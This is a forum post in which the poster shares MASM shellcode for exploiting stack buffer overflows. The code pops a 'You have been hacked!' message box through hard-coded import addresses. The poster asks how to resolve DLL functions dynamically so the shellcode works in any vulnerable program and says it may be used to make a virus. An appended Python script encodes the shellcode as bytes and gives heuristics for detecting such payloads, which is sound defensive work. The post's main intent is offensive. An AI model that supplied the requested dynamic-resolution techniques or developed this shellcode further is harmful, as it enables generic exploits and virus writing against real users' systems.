Hi all,
I'm writing shellcode for stack buffer overflow vulnerabilities; I have learned about it and read a lot about this vulnerability, and finally I have the ability to exploit it and make the shells.
This is my code:
;+-+-+-+-+[ FileName: shellcode.asm ]+-+-+-+-+-+
.386
.model flat, stdcall
option casemap:none
;+-+-+-+-+ Include Files +-+-+-+-+-+
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
;+-+-+-+-+ Include Libraries +-+-+-+-+
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
.code
main:
;|=--------------=[ shell code section ]=---------------=|
push 0 ; OK button
jmp _caption
_rCaption:
jmp _msg
_rMsg:
push 0 ; hWnd
call DWORD PTR DS:[402034h] ; <=> call MessageBox
push 0
call DWORD PTR DS:[402014h] ; <=> call ExitProcess
;|=--------------=[ shell data section ]=---------------=|
_caption:
call _rCaption ; <=> push offset caption
caption db "ha ha",0
_msg:
call _rMsg ; <=> push offset msg
msg db "You have been hacked!",0
end main
Now, as you can see, the routines above (MessageBox and ExitProcess) are static, so I must know the addresses of the procedures inside the target program, put them into the shell, and assemble it again!! :(
Is there any way to make the shell dynamic? My point is: how do I include the DLL procedures inside the body of programs?
The reason for my question is to make the shell work in any program that has the stack buffer overflow vulnerability, and maybe to make a virus work the same way.
Note: I don't accept the solution that makes the shell take the addresses from the import data section of the target program; this can work for the example above but doesn't work with shells that use different DLL procedures.
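From the detection side, the posted snippet relies on two idioms that a scanner can look for in an untrusted input buffer: calls through hard-coded absolute slots (FF 15 imm32, the `call DWORD PTR DS:[...]` lines) and the "call over the data" trick, where a backward `call` is placed right in front of a string so the pushed return address doubles as a pointer to it. The following is an added example, not code from the original post: the sample bytes are my own hand-encoding of the poster's MASM snippet rebased to offset 0, and both heuristics are mine, so expect false positives on ordinary compiled code.

```python
import struct

# Constructed sample: my own hand-encoding of the posted MASM snippet, rebased to offset 0.
# push 0 / jmp _caption / _rCaption: jmp _msg / _rMsg: push 0 / call [402034h] /
# push 0 / call [402014h] / _caption: call _rCaption / "ha ha",0 / _msg: call _rMsg / "You have been hacked!",0
SAMPLE_SHELLCODE = (
    b"\x6a\x00" b"\xeb\x12" b"\xeb\x1b" b"\x6a\x00"
    b"\xff\x15\x34\x20\x40\x00" b"\x6a\x00" b"\xff\x15\x14\x20\x40\x00"
    b"\xe8\xe9\xff\xff\xff" b"ha ha\x00"
    b"\xe8\xe0\xff\xff\xff" b"You have been hacked!\x00"
)

def find_call_over_string(buf, min_len=3):
    """Find E8 rel32 calls that jump backwards and are immediately followed by a
    NUL-terminated printable string: the pushed return address is the string pointer.
    Returns a list of (call_offset, call_target, text)."""
    hits = []
    for i in range(len(buf) - 4):
        if buf[i] != 0xE8:
            continue
        rel = struct.unpack_from("<i", buf, i + 1)[0]
        target = i + 5 + rel
        if not 0 <= target < i:            # must land earlier, inside the buffer
            continue
        end = buf.find(b"\x00", i + 5)
        if end == -1:
            continue
        text = buf[i + 5:end]
        if len(text) >= min_len and all(0x20 <= c < 0x7F for c in text):
            hits.append((i, target, text.decode("ascii")))
    return hits

def find_absolute_indirect_calls(buf):
    """Find FF 15 imm32 (call dword ptr [abs32]): a call through a hard-coded absolute
    slot. Normal in compiled code, but a strong hint of a non-relocatable blob when it
    appears inside input data. Returns a list of (offset, slot_address)."""
    return [(i, struct.unpack_from("<I", buf, i + 2)[0])
            for i in range(len(buf) - 5)
            if buf[i] == 0xFF and buf[i + 1] == 0x15]

def scan(buf):
    """Combine both heuristics; either alone is weak evidence, both in a small blob
    is a good reason to quarantine the input and inspect it."""
    strings = find_call_over_string(buf)
    abs_calls = find_absolute_indirect_calls(buf)
    return {"strings": strings, "abs_calls": abs_calls,
            "suspicious": bool(strings) and bool(abs_calls)}

if __name__ == "__main__":
    print(scan(SAMPLE_SHELLCODE))
```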